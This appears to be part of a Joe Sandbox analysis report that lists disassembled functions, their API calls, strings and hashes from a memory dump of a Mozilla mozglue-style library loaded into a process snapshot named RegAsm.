Instruction ID: b7ae0b539912c09e5d3df4dc61330c8825f402b72963e462cda8d72e4160a847
Opcode Fuzzy Hash: 70c5dfdecec5fbbcee9f7c1379df1daeedbc271e23e2b47ab6bd209b5a60f669
Instruction Fuzzy Hash: 3AF0A032305214ABDB009F6BD808BB57BB4AB9225AF000029F925D3F80CB785445EBA9

Function 6C1320B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C1320B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C11FBD1), ref: 6C1320C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C11FBD1), ref: 6C1320DA
free.MOZGLUE(00000000,?,6C11FBD1), ref: 6C1320F1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 31a8a091ad6acd965cdb2f956618d6852ff570f40d3c0968fbdaed7d192638d6
Instruction ID: 8cb905651b0a9b32c7b1ff561f20800c0816df3856a1802ad87017e4ddc67dde
Opcode Fuzzy Hash: 31a8a091ad6acd965cdb2f956618d6852ff570f40d3c0968fbdaed7d192638d6
Instruction Fuzzy Hash: 29E0E531700A248BC220AF26D80865EB7F9EF86218B00022AF44E83B01DB79E54A96D5

Function 6C1385B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C1385D3

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C138725

Strings

map/set<T> too long, xrefs: 6C138720

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 6c86c41b161316263eae045f176a7a4fd42e5a671637bf8c328e6456456c9c66
Instruction ID: f6eae05a97dff74739917ba60b1d02021712355cc9f8a8c859ceb9e15e00965f
Opcode Fuzzy Hash: 6c86c41b161316263eae045f176a7a4fd42e5a671637bf8c328e6456456c9c66
Instruction Fuzzy Hash: 815154B46006618FE701CF18C184B56BBF1BF5A318F19C18AD8599BB62C375E886CF92

Function 6C0EBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0EBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EBE8F

Strings

0, xrefs: 6C0EBE5B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: b23650a47f4e85a8875acca240a710bbc93681d3457899441120550ec4bfd703
Instruction ID: a929a93518545f94b19bf6f223251212a214f5d2fdd4f8a1f2bdfc2cb3db8484
Opcode Fuzzy Hash: b23650a47f4e85a8875acca240a710bbc93681d3457899441120550ec4bfd703
Instruction Fuzzy Hash: CA419B719497458FC701CF28C481A9BBBE4AF8E348F008A1DF985A7711E730E9598B86

Function 6C0E9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9B2C
memcpy.VCRUNTIME140(6C0E99CF,00000000,?), ref: 6C0E9BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C0E9DE4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a846e871ff483c21440cd6c4dd1c6c58e962defec0b3bc41c39bbd5216f79fb0
Instruction ID: 73b98c1abfde615bec730e11c22350e5a44e2111b1382ad2300fad962075d544
Opcode Fuzzy Hash: a846e871ff483c21440cd6c4dd1c6c58e962defec0b3bc41c39bbd5216f79fb0
Instruction Fuzzy Hash: B1D15871A0021A9FCB14CF69C980AEEBBF2FF88314F188529E959A7740D771E955CB90

Function 6C130A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C0F37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C14145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C0F380A

Part of subcall function 6C128DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C1406E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C128DCC

Part of subcall function 6C130B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C13138F,?,?,?), ref: 6C130B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C13138F,?,?,?), ref: 6C130B27
free.MOZGLUE(?,?,?,?,?,6C13138F,?,?,?), ref: 6C130B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C130AB5

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 34bbd034e33de0a9384476119f86aa3519171c8b14598d52e99f4072ff1aa507
Instruction ID: e617662154f34a03a15c829c051c7532f387cf66897d257af512a4dc65ee175a
Opcode Fuzzy Hash: 34bbd034e33de0a9384476119f86aa3519171c8b14598d52e99f4072ff1aa507
Instruction Fuzzy Hash: 7521F7B5B002549BDB04DF59C850BBFB3B5AF8570CF10042DD819ABB40DB74A945CBA1

Function 6C0EF180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C0EF19B

Part of subcall function 6C10D850: EnterCriticalSection.KERNEL32(?), ref: 6C10D904
Part of subcall function 6C10D850: LeaveCriticalSection.KERNEL32(?), ref: 6C10D971
Part of subcall function 6C10D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C10D97B

mozalloc_abort.MOZGLUE(?), ref: 6C0EF209

Strings

d, xrefs: 6C0EF1F5

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: ec997a5bbaab32adfed7b0d803ab2a5deb08d33261d3b629f6af0812e4d849d6
Instruction ID: f14dcb161a651862fc8b4bf3a627b38949a5be77255258993247dd09d3c388e1
Opcode Fuzzy Hash: ec997a5bbaab32adfed7b0d803ab2a5deb08d33261d3b629f6af0812e4d849d6
Instruction Fuzzy Hash: AD113A36B0564D8AEB048F6899512FEB3FDDF4A208B51522DDC05ABB11EF309A84C390

Function 6C0FCA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C0FCA26

Part of subcall function 6C0FCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0FCB49
Part of subcall function 6C0FCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0FCBB6

mozalloc_abort.MOZGLUE(?), ref: 6C0FCAA2

Strings

d, xrefs: 6C0FCA6C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: e8b7260277105e41061360527f9a22088b512157f9d4a9c76bbd22d705ce2fc0
Instruction ID: b3d4687027ce08097e835091e8a241f66603ff17f6f52d69def58b1f1a31a181
Opcode Fuzzy Hash: e8b7260277105e41061360527f9a22088b512157f9d4a9c76bbd22d705ce2fc0
Instruction Fuzzy Hash: 98112562E0068883DB01EB68C8011FDB3B4EF96208B858329DC5597612FB30B5C5C380

Function 6C123CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C123D19
mozalloc_abort.MOZGLUE(?), ref: 6C123D6C

Strings

d, xrefs: 6C123D58

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 5472e4fbf98b3c54c3be069c32712b51f759d989018fc05f29b640a3bff9629b
Instruction ID: 2ea01f47c2ebf010205ebffe6fa3e1d536e7dc56da9644ebc4018eb5e0de3c52
Opcode Fuzzy Hash: 5472e4fbf98b3c54c3be069c32712b51f759d989018fc05f29b640a3bff9629b
Instruction Fuzzy Hash: 4C110139E0468C9BDB019B69CC148EDB779EF96218BC58328EC449BA02EB34A5C5C790

Function 6C101A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6C101A6B

Part of subcall function 6C101AF0: EnterCriticalSection.KERNEL32(?), ref: 6C101C36

mozalloc_abort.MOZGLUE(?), ref: 6C101AE7

Strings

d, xrefs: 6C101AB1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: cbb3dc8def25107992d04e148900fad17d51634a262c42e7360c284ea44a0886
Instruction ID: 807fe5f3e334e12b64f9f5ed99dedb1883508f0c70916084659c28390dc4863b
Opcode Fuzzy Hash: cbb3dc8def25107992d04e148900fad17d51634a262c42e7360c284ea44a0886
Instruction Fuzzy Hash: 26112032F0028CC3DB009BA8C8115FEB779EF95208F958618ED466BB02EB34E6C4C380

Function 6C0F4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0F44B2,6C16E21C,6C16F7F8), ref: 6C0F473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0F474A

Strings

GetNtLoaderAPI, xrefs: 6C0F4744

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: 33ac8014433eebec723a7fa8bb72b658bcb40cbafa16b51c49229ac965aef32c
Instruction ID: 650ce8fa57017ccabf90f079cd14cf38ee0716e7024b12d677b9df9c265600a7
Opcode Fuzzy Hash: 33ac8014433eebec723a7fa8bb72b658bcb40cbafa16b51c49229ac965aef32c
Instruction Fuzzy Hash: 13019E763003249FDF009FA688886297BF9FF8B361B044069ED15C7700DB74D9029FA1

Function 6C146DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C146E22
__Init_thread_footer.LIBCMT ref: 6C146E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C146E1D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 14fdd4a9b440d722421ad458aeb235026ed0f3b2b0b3c1ce63413af723e229a6
Instruction ID: 3f592c30261b6aaa6bf4e9c7e5370724a9df81ab3774b79dbe2997aad54118e0
Opcode Fuzzy Hash: 14fdd4a9b440d722421ad458aeb235026ed0f3b2b0b3c1ce63413af723e229a6
Instruction Fuzzy Hash: A7F05976208284CBDA00CB6AC854FA137B2E71321CF045165C86087F51C726A617DA93

Function 6C0F9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C0F9EEF

Strings

Infinity, xrefs: 6C0F9EB7
NaN, xrefs: 6C0F9EC1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 442e22ee4fca685607cd20ef1c9e1f13fe85216eb42299e78b69e400342a2d64
Instruction ID: 2a47f7830ead423737534ae808213d2881ba55aa7e92accaa722d50d7e587847
Opcode Fuzzy Hash: 442e22ee4fca685607cd20ef1c9e1f13fe85216eb42299e78b69e400342a2d64
Instruction Fuzzy Hash: A5F0C2B2604241CBDB00CF1AD84976037B1F70331EF205A24C9300BF40D33676A6DA82

Function 6C145900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C1651C8), ref: 6C14591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C14592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C145915

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: ff45bf32d43132d1a1b2225b5d06d7574f1059412962b2b9cfa88eefbe64b484
Instruction ID: a434ad32985d28166fdff5b443967329fff845aeac1f7af6a69b7a03421553b0
Opcode Fuzzy Hash: ff45bf32d43132d1a1b2225b5d06d7574f1059412962b2b9cfa88eefbe64b484
Instruction Fuzzy Hash: D5E04F30205240BBDB008B6ACA0C7557FF99B27329F149649F56993ED2C3B5A850E791

Function 6C0FBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C0FBEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C0FBEF5

Strings

cryptbase.dll, xrefs: 6C0FBEF0

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 8f1120bf7188f84e8ccefbdf6d5976e528206ef1b2e1c545ce26f198112174f5
Instruction ID: 297fc3c23109427d4230efb2f6b61bffeda01f5123bc02f09dc88a00c9f1e563
Opcode Fuzzy Hash: 8f1120bf7188f84e8ccefbdf6d5976e528206ef1b2e1c545ce26f198112174f5
Instruction Fuzzy Hash: 8ED0C731184108EAD640AA518D09B3937F49705715F50C021F75554951C7B19451EF54

Function 6C0E50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C,?,?,?,?,?), ref: 6C0E510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C,?,?,?,?,?), ref: 6C0E5167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C0E5196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0E4E9C), ref: 6C0E5234

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 94c8b31b43617d3cc3214f8f64f3012ba07b7d994737bec37d902213dc025a04
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: 87918C79505616CFCB14CF18C490A5ABBE2BF8D318B29898CED589B725D371EC42CBE1

Function 6C1208F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C120918
LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C1209A6
EnterCriticalSection.KERNEL32(6C16E7DC,?,00000000), ref: 6C1209F3
LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C120ACB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 63e9d2e586a70de540f1d8c40a2ed4421e29cd47071ad4ebe07f9dbb19590cb9
Instruction ID: 46c86dd2728813ae026190c8dca2ad1a4b843fd6d198d42dc81e6371a6d1d93a
Opcode Fuzzy Hash: 63e9d2e586a70de540f1d8c40a2ed4421e29cd47071ad4ebe07f9dbb19590cb9
Instruction Fuzzy Hash: 88514A3B7025508FEF089A1AC82473573B5EFC1B64725433AD96697F80D739E99197C0

Function 6C1459C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C11E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C145A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C11E56A,?,|UrlbarCSSSpan), ref: 6C145A5C
free.MOZGLUE(?), ref: 6C145A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C145B9D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 1d69b4aee04a644fb93a27c81e406c08ee60c82cc128b0b0fd62a3572b085dd8
Instruction ID: 3449426816ec7df5b4a87293d01efab85ff585f36d4663a0912f86a5fd3bfd08
Opcode Fuzzy Hash: 1d69b4aee04a644fb93a27c81e406c08ee60c82cc128b0b0fd62a3572b085dd8
Instruction Fuzzy Hash: 64515DB06087409FD700CF29C8C071ABBE5EF99318F14CA6DE8999B746D774D945CB62

Function 6C13B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B628

Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C1390FF
Part of subcall function 6C1390E0: free.MOZGLUE(?,00000000,?,?,6C13DEDB), ref: 6C139108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C13B2C9,?,?,?,6C13B127,?,?,?,?,?,?,?,?,?,6C13AE52), ref: 6C13B708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C13B127,?,?,?,?,?,?,?,?), ref: 6C13B74D

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
